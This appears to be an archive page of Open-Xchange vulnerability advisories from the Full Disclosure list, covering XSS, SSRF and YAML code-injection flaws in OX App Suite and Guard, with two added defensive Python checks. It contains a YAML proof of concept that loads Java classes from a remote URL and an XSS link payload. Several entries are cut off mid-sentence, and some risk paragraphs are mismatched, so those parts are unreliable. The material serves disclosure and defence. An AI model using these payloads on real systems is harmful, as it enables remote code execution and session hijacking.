[FD] Open-Xchange Security Advisory 2021-11-19

2021-11-21 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
  Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH



Internal reference: OXUIB-872
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev30, 7.10.4-rev27, 7.10.5-rev18
Vendor notification: 2021-06-01
Solution date: 2021-08-23
Public disclosure: 2021-11-19
CVE reference: CVE-2021-38374
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
The "app loader" mechanism of the frontend component could be abused to load 
content from relative URLs, outside of the intended code loading API path. This 
can be used by attackers to add references to malicious content that is served 
by the same domain.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site). To exploit this, an attacker would require 
the victim to follow a hyperlink.

Steps to reproduce:
1. As attacker, upload a code snippet to Drive and create a sharing link
2. Modify the "app loader" URL to include a relative reference to the shared 
code snippet
3. Embed a direct reference to this snippet at a malicious website or make a 
user follow the reference

Solution:
We now restrict relative references to only include the intended API path.



---



Internal reference: MWB-1113
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: middleware
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21
Vendor notification: 2021-06-02
Solution date: 2021-08-23
Public disclosure: 2021-11-19
CVE reference: CVE-2021-38375
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
HTML E-Mails with lots of content are truncated for improved performance. 
Their full content is delivered when opening the HTML part in a dedicated 
browser tab. The mechanism that dealt with inline images allowed script code 
to be injected via the "alt" attribute of an HTML img tag.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site). To exploit this, an attacker would require 
the victim to open the non-truncated representation of an E-Mail.

Steps to reproduce:
1. Create an artificially large HTML E-Mail with script code in an image's 
"alt" attribute
2. Deliver the mail and make the victim display the truncated part

Proof of concept:


Solution:
We updated the detection and sanitization logic to deal with embedded script 
code fragments.



---



Internal reference: MWB-1116
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: middleware
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21
Vendor notification: 2021-06-02
Solution date: 2021-08-23
Public disclosure: 2021-11-19
CVE reference: CVE-2021-38377
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
HTML E-Mails with lots of content are truncated for improved performance. 
Their full content is delivered when opening the HTML part in a dedicated 
browser tab. The mechanism that dealt with temporary internal transformation 
state allowed script code to be injected by abusing an "anchor" HTML comment. 
The comment's identifier is a predictable UUID, and it stores HTML 
transformation results, which are exempt from sanitization.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site). To exploit this, an attacker would require 
the victim to open the non-truncated representation of an E-Mail.

Steps to reproduce:
1. Create an artificially large HTML E-Mail with script code in an "anchor" 
comment
2. Deliver the mail and make the victim display the truncated part

Proof of concept:


Solution:
We now use a random value for temporary anchors so that this internal state 
cannot be exploited.


---



Internal reference: MWB-1185
Vulnerability type: Information Disclosure (CWE-200)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: middleware
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev36, 7.10.4-rev27, 7.10.5-rev21
Vendor notification: 2021-07-15

[FD] Open-Xchange Security Advisory 2021-11-18

2021-11-21 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
  Martin Heiland, Open-Xchange GmbH



Product: OX App Suite, OX Documents
Vendor: OX Software GmbH


Internal reference: MWB-993
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13
Vendor notification: 2021-03-09
Solution date: 2021-06-01
Public disclosure: 2021-11-18
CVE reference: CVE-2021-33489
CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Specific image formats use media-types that were not recognized by our 
sanitization engine. When injecting HTML and JS code into such files, they could 
bypass sanitization methods.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site). To exploit this, an attacker would require 
the victim to follow a hyperlink.

Steps to reproduce:
1. Create an XCF image file and include JS code
2. Share the file using OX Drive sharing
3. Make someone click the direct link to the shared file

Solution:
We improved the list of known unsafe media-types to make sure such content is 
handled as a binary file and a download is enforced.



---



Internal reference: MWB-1067
Vulnerability type: Code Injection (CWE-94)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: middleware
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13
Vendor notification: 2021-05-06
Solution date: 2021-06-01
Public disclosure: 2021-11-18
CVE reference: CVE-2021-33493
CVSS: 3.9 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N)

Vulnerability Details:
The middleware component uses YAML for complex configuration constructs. The 
parser used for that purpose offers an insecure parsing method, which could be 
abused to inject YAML representations of arbitrary Java classes that would be 
executed.

Risk:
Arbitrary Java code could be executed in the context of the middleware process. 
To exploit this, a user with high privileges or a compromised workload would 
have to maliciously modify configuration files. These modifications are very 
likely to cause malfunction and keep the service from starting properly.

Steps to reproduce:
1. Add YAML representation of Java classes to a configuration file
2. Reload configuration or restart

Proof of concept:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://example.open-xchange.com/"]
  ]]
]

Solution:
We now use a parsing method that is limited to creating the safe Java classes 
which are expected for configuration files.
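As a defender-side check tied to this issue, the following scanner (added here; it is not Open-Xchange code) reports every global tag outside the YAML core types in a configuration file, with its line number, so a modified file is caught before the service reloads it. The sample configuration is constructed and only borrows the tag shape of the proof of concept above.

```python
"""Pre-reload audit of YAML configuration files (added illustration, not OX
middleware code). MWB-1067 hinges on a loader that resolves arbitrary "!!"
global tags into Java classes. Configuration only ever needs the YAML core
types, so any other global tag in a config file is a finding; the scan is
purely textual and therefore independent of which loader the service uses."""
import re

# YAML 1.1/1.2 core and common types; everything else is reported.
CORE_TAGS = {"str", "int", "float", "bool", "null", "seq", "map", "binary",
             "timestamp", "set", "omap", "pairs", "merge", "value"}
TAG_RE = re.compile(r"!!([A-Za-z_][\w.$/-]*)")


def find_unsafe_tags(text):
    """Return [(line_number, tag), ...] for every non-core '!!' tag.
    Deliberately conservative: a tag inside a quoted string or a comment is
    reported too, which is acceptable for a check that gates a reload."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in TAG_RE.finditer(line):
            tag = match.group(1)
            if tag not in CORE_TAGS:
                findings.append((lineno, tag))
    return findings


# Constructed sample: a benign fragment followed by the advisory's PoC shape.
SAMPLE_CONFIG = """\
service:
  name: !!str mail-backend
  cert: !!binary AAEC
  limits: {connections: 100, timeout: 30}
hook: !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://example.open-xchange.com/"]
  ]]
]
"""

if __name__ == "__main__":
    for lineno, tag in find_unsafe_tags(SAMPLE_CONFIG):
        print(f"line {lineno}: unexpected global tag !!{tag}")
```

Wire `find_unsafe_tags` into whatever runs before a configuration reload and refuse the reload on any finding; the benign `!!str` and `!!binary` tags in the sample are not reported.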



---



Internal reference: MWB-1094
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev35, 7.10.4-rev25, 7.10.5-rev13
Vendor notification: 2021-05-20
Solution date: 2021-06-01
Public disclosure: 2021-11-18
CVE reference: CVE-2021-33490
CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
HTML content stored as a "snippet" does not get properly sanitized in case 
invalid HTML is stored.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site). To exploit this, an attacker would either 
need access to the victim's account or be part of the same context.

Steps to reproduce:
1. Create a snippet with broken HTML code and store it as (shared) mail 
signature
2. Make users select the malicious mail signature

Solution:
We improved sanitization of snippets, including invalid HTML code.



---



Internal reference: DOCS-3309
Vulnerability type: Relative Path Traversal (CWE-23)
Vulnerable version: 7.10.5 and earlier
Vulnerable component: office
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.3-rev15, 7.10.4-rev9, 7.10.5-rev6
Vendor notification: 2021-03-23
Solution date: 2021-06-01
Public disclosure: 2021-11-18
CVE reference: CVE-2021-33491
CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L)

Vulnerability Details:
External mail account discovery allows malicious users to append arbitrary URL 
paths to mail addresses. In combination with malicious auto-configuration DNS 
records, this can be abused to access web services outside of the expected 
trust boundary, regardless of existing blocklists.

Risk:
Zip archives (like OOXML and ODF documents) might contain entrie

[FD] Open-Xchange Security Advisory 2020-10-13

2020-10-16 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX App Suite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite / OX Documents
Vendor: OX Software GmbH



Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.2, 7.10.3
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev29, 7.10.3-rev15
Vendor notification: 2020-04-27
Solution date: 2020-07-01
Public disclosure: 2020-10-13
Researcher Credits: MOGWAI LABS GmbH
CVE reference: CVE-2020-15004
CVSS: 2.2 (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
An internal diagnostics servlet returned the content of an HTTP GET request as 
part of the generated website. This can be used to supply malicious JS code via 
a hyperlink. Access to the servlet is unauthenticated and not possible over a 
public network by default.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site).

Steps to reproduce:
1. Create a link to the diagnostics servlet containing script code
2. Make someone with access to this servlet click the link

Proof of concept:
http://example.com:8009/stats/diagnostic?param=%3Cscript%3Ealert(%27ayb%27);%3C/script%3E%22

Solution:
We no longer return any supplied parameter as part of the HTML page.



---



Internal reference: MWB-289
Vulnerability type: Information exposure (CWE-200)
Vulnerable version: 7.10.2, 7.10.3
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev29, 7.10.3-rev15
Vendor notification: 2020-05-08
Solution date: 2020-07-01
Public disclosure: 2020-10-13
CVE reference: CVE-2020-15003
CVSS: 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
When accessing a public or restricted share as a guest, for example in Drive, 
users have the ability to query and terminate sessions of other guests. This 
exposes IP addresses, OS and user agent information as well as session 
identifiers.

Risk:
Malicious guest users are able to terminate other users' sessions. They can also 
look up other users' IP addresses and client information.

Steps to reproduce:
1. Create a shared Drive folder
2. Have several guests visit this share
3. As a guest, query the session API, check Settings -> Security

Solution:
We removed the ability for guests to access session information of other guests.



---



Internal reference: MWB-348
Vulnerability type: Server-side request forgery (CWE-918)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev72, 7.10.1-rev32, 7.10.2-rev29, 7.10.3-rev15
Vendor notification: 2020-06-03
Solution date: 2020-07-01
Public disclosure: 2020-10-13
CVE reference: CVE-2020-15002
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
Messaging account URLs can be set and requested through the API. These are not 
filtered through our blacklists and may contain local or internal network hosts.

Risk:
While this feature is not exposed through our user interface, knowledgeable 
attackers can use the API to query internal resources through network requests 
and assess the availability of systems and what services they run. This can be 
used as a reconnaissance step during an attack.

Steps to reproduce:
1. Use the "/ajax/messaging/account" API to set up a new messaging account and 
provide an internal "url"
2. Use the "/ajax/messaging/message" message API to list new messages for this 
account. Based on the response time and error message it's possible to assess 
if a service is available or not.

Solution:
We extended existing blacklist checks to this feature.



---



Internal reference: OXUIB-308
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.2 and 7.10.3
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev26, 7.10.3-rev13
Vendor notification: 2020-06-10
Solution date: 2020-07-01
Public disclosure: 2020-10-13
Researcher Credits: Zeeshan Khalid
CVE reference: CVE-2020-15004
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Bootstrap attributes can be used to execute script code at appointment titles.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (e.g. 
redirecting to a third-party site). To exploit this, an attacker would either 
send a malicious calendar invite or be part of the same organization to invite 
the victi

[FD] Open-Xchange Security Advisory 2020-08-20

2020-08-21 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX App Suite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
  Martin Heiland, Open-Xchange GmbH



Product: OX App Suite / OX Documents
Vendor: OX Software GmbH



Internal reference: MWB-70 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev70, 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12
Vendor notification: 2020-02-07
Solution date: 2020-05-13
Public disclosure: 2020-08-20
Researcher Credits: raiz_
CVE reference: CVE-2020-12646
CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Our script filters did not consider the ancient media-type "text/x-javascript" 
as potentially malicious, however Google Chrome executes content of this type 
as script code.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.). To exploit this, an additional step is necessary, 
which could be achieved through social engineering.

Steps to reproduce:
1. Upload a code snippet to Drive and modify its media-type
2. Share the file publicly and make a user open this link
3. Next, make the user visit a direct API reference to the file and add 
"delivery=view" as an API parameter

Solution:
We improved our filter to consider this media-type.
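Both this entry and MWB-993 (XCF files, in the 2021-11-18 advisory above) come down to the same decision: which declared media types may a shared file be rendered inline with, and what happens to everything else. The following Python is an added illustration of that decision, not OX App Suite code; the allowlists, the extension check and the header set are assumptions made here.

```python
"""Delivery decision for files served from Drive (added illustration, not OX
App Suite code). It models the fix in MWB-993 and MWB-70: a file is rendered
inline only when its media type is on a short allowlist of types a browser
cannot execute as script; anything else, including "text/x-javascript" and
formats the sanitizer does not understand such as XCF, is forced down as an
opaque binary download. The file-name and extension checks are assumptions
added here as defence in depth."""
import re

# Types a browser displays without running script. Short on purpose: the safe
# default for an unknown type is "download", not "display".
INLINE_SAFE = {"image/png", "image/jpeg", "image/gif", "image/webp",
               "image/bmp", "text/plain", "application/pdf"}
# Types that are executed or rendered as markup by browsers; these never go
# inline, whatever the delivery parameter says.
ACTIVE_CONTENT = {"text/html", "application/xhtml+xml", "image/svg+xml",
                  "text/xml", "application/xml", "text/javascript",
                  "application/javascript", "application/x-javascript",
                  "text/x-javascript", "text/ecmascript", "application/ecmascript"}
ACTIVE_EXTENSIONS = {"html", "htm", "xhtml", "svg", "xml", "js", "mjs"}


def normalize_media_type(declared):
    """Lower-case the type and drop parameters such as '; charset=utf-8'."""
    return (declared or "").split(";", 1)[0].strip().lower()


def safe_filename(name):
    """Keep the name usable in a header: strip control chars, quotes, backslashes."""
    cleaned = re.sub(r'[\x00-\x1f\x7f"\\]', "", name).strip()
    return cleaned or "download"


def delivery_headers(declared_type, filename, delivery="download"):
    """Response headers for one file. delivery="view" asks for inline display,
    which is granted only if both the declared type and the extension are
    inert; every other request becomes an attachment of type octet-stream."""
    media_type = normalize_media_type(declared_type)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    name = safe_filename(filename)
    inline_ok = (delivery == "view" and media_type in INLINE_SAFE
                 and media_type not in ACTIVE_CONTENT
                 and ext not in ACTIVE_EXTENSIONS)
    headers = {"X-Content-Type-Options": "nosniff",   # no sniffing into script
               "Content-Security-Policy": "default-src 'none'"}
    if inline_ok:
        headers["Content-Type"] = media_type
        headers["Content-Disposition"] = f'inline; filename="{name}"'
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{name}"'
    return headers


if __name__ == "__main__":
    # Constructed requests: the advisory's media type, an XCF image, a real PNG.
    for args in [("text/x-javascript", "snippet.txt", "view"),
                 ("image/x-xcf", "image.xcf", "view"),
                 ("image/png", "photo.png", "view")]:
        print(args, "->", delivery_headers(*args))
```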



---



Internal reference: MWB-107 (Bug ID)
Vulnerability type: Improper input validation (CWE-20)
Vulnerable version: 7.10.1 to 7.10.3
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12
Vendor notification: 2020-02-24
Solution date: 2020-05-13
Public disclosure: 2020-08-20
Researcher Credits: Osama Hamad Shehab
CVE reference: CVE-2020-12645
CVSS: 3.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
When using OX App Suite for authentication directly, a login "rate-limit" is 
applied. This could be circumvented by exploiting logic issues when handling 
the client's user-agent string.

Risk:
Brute-force attempts could be made using large quantities of arbitrary 
passwords to discover account credentials. While this attack would be quite 
noisy it's possible that it may not get noticed on unmonitored systems. The 
attacker would still hit the generic API request limit at some point.

Steps to reproduce:
1. Use the /login API and send login attempts until the rate-limit hits
2. Modify the user-agent string
3. Resume login attempts

Solution:
We fixed the logic dealing with buckets of login processes to discover such 
attempts and correctly apply rate limiting.



---



Internal reference: MWB-108 (Bug ID)
Vulnerability type: Access Control Bypass (CWE-639)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev70, 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12
Vendor notification: 2020-02-24
Solution date: 2020-05-13
Public disclosure: 2020-08-20
Researcher Credits: kattsson
CVE reference: CVE-2020-12643
CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Incorrect permission checks were performed when requesting other users' 
"snippets". This can be used to discover E-Mail addresses of external accounts.

Risk:
Potentially sensitive information about other users can be discovered and used 
for further attacks. Access is limited to users within the same context.

Steps to reproduce:
1. Use the /api/subscriptions API and request arbitrary subscription IDs for 
other user IDs
2. If a combination of user ID and subscription ID matches, metadata about a 
subscription would be returned

Solution:
We improved permissions checks in this area to limit exposure of information.



---



Internal reference: MWB-120 (Bug ID)
Vulnerability type: Improper input validation (CWE-20)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev70, 7.10.1-rev31, 7.10.2-rev26, 7.10.3-rev12
Vendor notification: 2020-02-27
Solution date: 2020-05-13
Public disclosure: 2020-08-20
Researcher Credits: kattsson
CVE reference: CVE-2020-12645
CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N)

Vulnerability Details:
Vacation notices could be used to send E-Mail with arbitrary sender information.

Risk:
Malicious users could set up vacation notices that send E-Mail responses with a 
forged sender address. Depending on the egress MTA configuration this can be 
used for impersonation.

Steps to reproduce:
1. Create vacatio

[FD] Open-Xchange Security Advisory 2020-06-12

2020-06-12 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite / OX Documents
Vendor: OX Software GmbH



Internal reference: 68441, 68453, 68454 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: backend, office documentconverter
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev68, 7.10.1-rev28, 7.10.2-rev22, 7.10.3-rev7
Vendor notification: 2019-11-29
Solution date: 2020-03-06
Public disclosure: 2020-06-12
CVE reference: CVE-2019-18846, CVE-2020-8544
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
Our blacklisting restrictions for various APIs have flaws that allow attackers 
to bypass certain checks by using "smart" endpoints. In detail, the check 
whether a URL is blacklisted was triggered independently of accessing the 
actual resource. Malicious endpoints with knowledge about application state 
could abuse this to bypass blacklisted resources. The same vulnerability 
affects multiple components.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be accessed, a 
different error will be returned compared to unavailable hosts. This can be 
used to discover an internal network topology and services.

Steps to reproduce:
1. Create an RSS feed
2. Specify a resource where the endpoint responds differently based on the 
request count
3. Return a valid result on the blacklist request but HTTP redirect when 
actually accessing the resource

Solution:
We improved the blacklisting check to make sure the actual resource is being 
checked when retrieving.



---



Internal reference: 68478 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev62, 7.10.1-rev28, 7.10.2-rev20, 7.10.3-rev6
Vendor notification: 2019-12-02
Solution date: 2020-03-06
Public disclosure: 2020-06-12
CVE reference: CVE-2020-8542
CVSS: 2.2 (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Self-XSS was possible when pasting malicious HTML content to the mail signature 
editor. This could be used as part of a social engineering scheme.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be accessed, a 
different error will be returned compared to unavailable hosts. This can be 
used to discover an internal network topology and services.

Steps to reproduce:
1. Ask a user to edit a mail signature and use the "Code" feature
2. Make the user paste malicious HTML Code, for example SVG with embedded JS
3. Example: "> sodales molestie velit

Solution:
We improved frontend sanitization of user-provided content.



---



Internal reference: OXUIB-39 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.3 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev28, 7.10.2-rev20, 7.10.3-rev6
Vendor notification: 2020-01-27
Solution date: 2020-03-06
Public disclosure: 2020-06-12
Researcher Credits: zee_shan
CVE reference: CVE-2020-8542
CVSS: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Script code within a HTML E-Mail was executed under certain circumstances, like 
agreeing to load external images.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be accessed, a 
different error will be returned compared to unavailable hosts. This can be 
used to discover an internal network topology and services.

Steps to reproduce:
1. Create a malicious mail with external images
2. Make the user load external content within the mail
3. Example: 

[FD] Open-Xchange Security Advisory 2020-06-12

2020-06-12 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX Guard
Vendor: OX Software GmbH



Internal reference: GUARD-179
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 2.10.3
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.10.2-rev9, 2.10.3-rev4
Vendor notification: 2020-02-04
Solution date: 2020-03-06
Public disclosure: 2020-06-12
CVE reference: CVE-2020-9426
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
Comments within forged malicious public keys could contain HTML and JavaScript 
that was not properly sanitized before being displayed in the Guard settings. 
Through autocrypt and other mechanisms such keys could get imported without 
their malicious content being noticed.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be accessed, a 
different error will be returned compared to unavailable hosts. This can be 
used to discover an internal network topology and services.

Steps to reproduce:
1. Create a PGP keypair
2. Use HTML and JS as part of the public keys comment section
3. Distribute this key through mail attachments, autocrypt or HKP

Solution:
We improved our sanitization and ensure that external content such as comments 
is handled safely.



---



Internal reference: GUARD-182
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 2.10.3
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.10.2-rev9, 2.10.3-rev4
Vendor notification: 2020-02-11
Solution date: 2020-03-06
Public disclosure: 2020-06-12
CVE reference: CVE-2020-9427
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
HKP/HKPS key discovery mechanisms are based on DNS service records. Those are 
probed to look up unknown public-keys but were insufficiently checked for 
sensitive resource locations.

Risk:
In case of a malicious DNS server or domain, an attacker could use this 
technique to redirect HTTP requests to internal networks. Taking timing and 
response codes into consideration, this can be used to determine whether a 
specific port at an internal system is open or not, leading to basic network 
discovery capabilities for the attacker.

Steps to reproduce:
1. Set up a malicious domain with HKP/HKPS service records, point them to a 
malicious HKP responder
2. At the malicious HKP responder, issue HTTP redirects targeting internal 
hosts like 127.0.0.1

Solution:
We now run HKP responses through existing blacklist mechanisms to avoid 
accessing internal network resources.



---



Internal reference: GUARD-183
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 2.10.3
Vulnerable component: guard
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 2.10.2-rev9, 2.10.3-rev4
Vendor notification: 2020-02-11
Solution date: 2020-03-06
Public disclosure: 2020-06-12
CVE reference: CVE-2020-9427
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
WKS/Webkey services discovery mechanisms are based on DNS service records. 
Those are probed to look up unknown public-keys but were insufficiently checked 
for sensitive resource locations.

Risk:
In case of a malicious DNS server or domain, an attacker could use this 
technique to redirect HTTP requests to internal networks. Taking timing and 
response codes into consideration, this can be used to determine whether a 
specific port at an internal system is open or not, leading to basic network 
discovery capabilities for the attacker. Mind that this attack gets mitigated 
when using DNSSEC, but depending on configuration this might get bypassed or 
not used.

Steps to reproduce:
1. Set up a malicious domain with WKS/Webkey service records, point them to a 
malicious WKS responder
2. At the malicious WKS responder, issue HTTP redirects targeting internal 
hosts like 127.0.0.1

Solution:
We now run WKS responses through existing blacklist mechanisms to avoid 
accessing internal network resources.



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Open-Xchange Security Advisory 2020-02-19

2020-02-20 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed to finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite / OX Documents
Vendor: OX Software GmbH

Internal reference: 67871, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Vulnerability Details:
The attachment API for Calendar, Tasks etc. allows defining references to 
